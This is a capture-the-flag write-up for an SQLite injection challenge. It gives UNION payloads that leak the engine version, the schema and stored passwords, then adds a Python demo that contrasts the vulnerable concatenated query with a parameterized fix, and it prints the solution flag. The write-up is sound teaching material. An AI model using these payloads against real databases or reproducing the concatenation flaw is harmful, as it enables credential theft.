level01
Select the user by ID you wish to view
Let's click on the Submit Query button.
Reading the source code, we can see that the database being used is SQLite and our input is being inserted within the following query:
SELECT id,username FROM users WHERE id=' . $injection . ' LIMIT 1
SQL Injection
In order to retrieve the flag, we first need to retrieve the table name. We can refer to the PayloadsAllTheThings list of SQLite injection payloads.
Extracting SQLite version
The SQLite version can be retrieved using the following query:
SELECT sqlite_version();
Since the original SELECT statement selects two columns, we need to select the same number of columns in our UNION query.
If we provide the following input:
1 UNION SELECT Null, sqlite_version();
The resultant query will be:
SELECT id,username FROM users WHERE id=1 UNION SELECT Null, sqlite_version(); LIMIT 1
The version of SQLite being used is 3.27.2.
Extracting database structure
For SQLite versions 3.33.0 and earlier, the sqlite_master table contains the schema for the database, including information about all the tables, indexes, views and triggers that exist in the database.
SELECT sql FROM sqlite_master
If we provide the following input:
1 UNION SELECT Null, sql FROM sqlite_master;
The resultant query becomes:
SELECT id,username FROM users WHERE id=1 UNION SELECT Null, sql FROM sqlite_master; LIMIT 1
There is a users table which has three columns: id, username and password.
Extracting the flag
Now that we know the table name is users, we can easily retrieve the password from the table.
If we provide the following input:
1 UNION SELECT id, password FROM users;
The resultant query becomes:
SELECT id,username FROM users WHERE id=1 UNION SELECT id, password FROM users; LIMIT 1
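The three steps above (version, schema, password) come down to one defect: the id is concatenated into the SQL text. The following added example is not the challenge's code; it rebuilds a users table with the three columns the sqlite_master dump revealed in an in-memory SQLite database (constructed contents), runs the writeup's string-built query next to a parameterized lookup, and shows that the same inputs leak nothing through the hardened version. The writeup's payloads rely on the trailing ; to detach LIMIT 1 from the compiled statement; Python's sqlite3 module executes only one statement per call, so the payloads here drop the semicolon and use id 0 (assumed to match no row) so that LIMIT 1 over the compound SELECT leaves only the injected row.

```python
# Added example, not the challenge's own code. It rebuilds the page's users
# table in an in-memory SQLite database and contrasts the string-built query
# from the writeup with a parameterized lookup. Table contents are constructed.
import sqlite3


def make_db():
    """Constructed stand-in for the challenge database: a users table with the
    three columns (id, username, password) the sqlite_master dump revealed."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "constructed-secret-1"), (2, "alice", "constructed-secret-2")],
    )
    return conn


def vulnerable_lookup(conn, injection):
    """Mirrors the writeup's query: input is spliced into the SQL text, so a
    UNION in the input becomes part of the statement."""
    query = "SELECT id,username FROM users WHERE id=" + injection + " LIMIT 1"
    return conn.execute(query).fetchone()


def safe_lookup(conn, user_input):
    """Hardened lookup: the id must parse as an integer and is passed as a bound
    parameter, so user input can never change the statement's structure."""
    try:
        user_id = int(user_input)
    except (TypeError, ValueError):
        return None  # not a plain integer id: reject rather than query
    return conn.execute(
        "SELECT id,username FROM users WHERE id=? LIMIT 1", (user_id,)
    ).fetchone()


# The writeup's three payloads, adapted: Python's sqlite3 executes one statement
# per call, so the trailing ';' is dropped and id 0 (assumed to match no row)
# keeps LIMIT 1 from hiding the injected row of the compound SELECT.
PAYLOAD_VERSION = "0 UNION SELECT NULL, sqlite_version()"
PAYLOAD_SCHEMA = "0 UNION SELECT NULL, sql FROM sqlite_master"
PAYLOAD_PASSWORD = "0 UNION SELECT id, password FROM users"


def run_demo():
    """Run each payload through both lookups and report what leaked."""
    conn = make_db()
    version_row = vulnerable_lookup(conn, PAYLOAD_VERSION)
    schema_row = vulnerable_lookup(conn, PAYLOAD_SCHEMA)
    password_row = vulnerable_lookup(conn, PAYLOAD_PASSWORD)
    return {
        # the injected second column carries the engine version
        "version_leaked": version_row[1] == sqlite3.sqlite_version,
        # the CREATE TABLE text for users comes back through the same column
        "schema_leaked": "CREATE TABLE users" in schema_row[1],
        "password_leaked": password_row[1].startswith("constructed-secret"),
        # the hardened lookup rejects every payload and still serves real ids
        "safe_rejects_payloads": all(
            safe_lookup(conn, p) is None
            for p in (PAYLOAD_VERSION, PAYLOAD_SCHEMA, PAYLOAD_PASSWORD)
        ),
        "safe_normal_lookup": safe_lookup(conn, "1"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The bound parameter alone is what closes the hole: with id=? SQLite treats the whole input as a value, never as SQL. The int() check in front of it is defence in depth, so that a non-numeric id is refused before a query is even issued and can be logged as a sign of tampering.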
Flag
WEBSEC{Simple_SQLite_Injection}